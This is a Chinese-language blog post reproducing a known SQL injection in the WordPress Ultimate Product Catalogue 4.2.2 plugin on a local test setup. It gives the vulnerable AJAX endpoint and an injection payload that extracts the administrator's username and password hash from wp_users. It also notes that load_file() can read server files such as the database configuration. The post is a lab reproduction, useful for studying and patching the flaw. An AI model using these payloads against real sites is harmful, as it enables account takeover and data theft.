WordPress插件SQL漏洞復(fù)現(xiàn)

該SQL漏洞存在于wordpress的插件Ultimate Produce Catalogue 4.2.2版本,在Exploit Database可以搜到這個(gè)漏洞的信息:https://www.exploit-db.com/exploits/42263/。

01.基礎(chǔ)環(huán)境

1. WordPress _v4.6源碼,安裝Ultimate Produce Catalogue 4.2.2版本插件。

2. 本機(jī)電腦搭建phpstudy作為WEB環(huán)境。

02.源碼部署

首先wordpress的安裝,這個(gè)之前在我已經(jīng)有詳細(xì)的搭建過(guò)程,有不明白的小伙伴可以查看。

下面介紹插件安裝,Ultimate Produce Catalogue插件安裝包的下載地址:

鏈接:http://pan.baidu.com/s/1o8Rvdfs

密碼:avul

安裝完成,啟用插件。

03.漏洞復(fù)現(xiàn)過(guò)程

首先我們使用管理賬號(hào)新建一個(gè)賬號(hào),名為testsql,利用testsql這個(gè)賬號(hào)通過(guò)sql注入漏洞拿到管理員的賬號(hào)。

然后使用testsql這個(gè)賬號(hào)進(jìn)行登陸。

存在漏洞的地址如下:

http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=get_upcp_subcategories

[請(qǐng)求數(shù)據(jù)]

CatID=0UNION SELECT 1,2

引起這個(gè)漏洞的原因是CatID的參數(shù)沒(méi)有做轉(zhuǎn)義處理導(dǎo)致sql注入,如下圖,可執(zhí)行sql語(yǔ)句。

下載之后,進(jìn)入首頁(yè),選擇插件,添加插件并安裝。

管理員管理員賬號(hào)和密碼的sql語(yǔ)句:

Payload:

CatID=0 UNION SELECT user_login,user_pass FROM wp_users WHERE ID=1

04.總結(jié)

這個(gè)漏洞有點(diǎn)雞肋,首先必須使用存在的賬號(hào)登陸才能夠回顯數(shù)據(jù),接著獲得admin的賬號(hào)密碼之后,密碼的破解難度很大,我們可以使用load_file()去讀取系統(tǒng)的文件,如下是讀取數(shù)據(jù)庫(kù)的配置文件。

查看源代碼:


最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書(shū)系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

推薦閱讀更多精彩內(nèi)容

  • 注入攻擊的分類 1.沒(méi)有正確過(guò)濾轉(zhuǎn)義字符 在用戶的輸入沒(méi)有為轉(zhuǎn)義字符過(guò)濾時(shí),就會(huì)發(fā)生這種形式的注入式攻擊,它會(huì)被傳...
    查無(wú)此人asdasd閱讀 1,655評(píng)論 0 5
  • SQL注入 概念 危害 原理 實(shí)例 防御 基礎(chǔ) - ### SQL語(yǔ)句所用符號(hào)不同數(shù)據(jù)庫(kù)的sql注入與提權(quán)常見(jiàn)S...
    yddchsc君閱讀 1,354評(píng)論 1 10
  • 漏洞挖掘與利用 測(cè)試環(huán)境的搭建 引言 為什么要搭建本地測(cè)試環(huán)境?我想下面的東西能夠回答你的疑惑。 第二百八十五條 ...
    作業(yè)沒(méi)寫(xiě)完閱讀 3,237評(píng)論 0 4
  • 一套實(shí)用的滲透測(cè)試崗位面試題,你會(huì)嗎? 1.拿到一個(gè)待檢測(cè)的站,你覺(jué)得應(yīng)該先做什么? 收集信息 whois、網(wǎng)站源...
    g0閱讀 4,882評(píng)論 0 9
  • Spring Cloud為開(kāi)發(fā)人員提供了快速構(gòu)建分布式系統(tǒng)中一些常見(jiàn)模式的工具(例如配置管理,服務(wù)發(fā)現(xiàn),斷路器,智...
    卡卡羅2017閱讀 134,869評(píng)論 18 139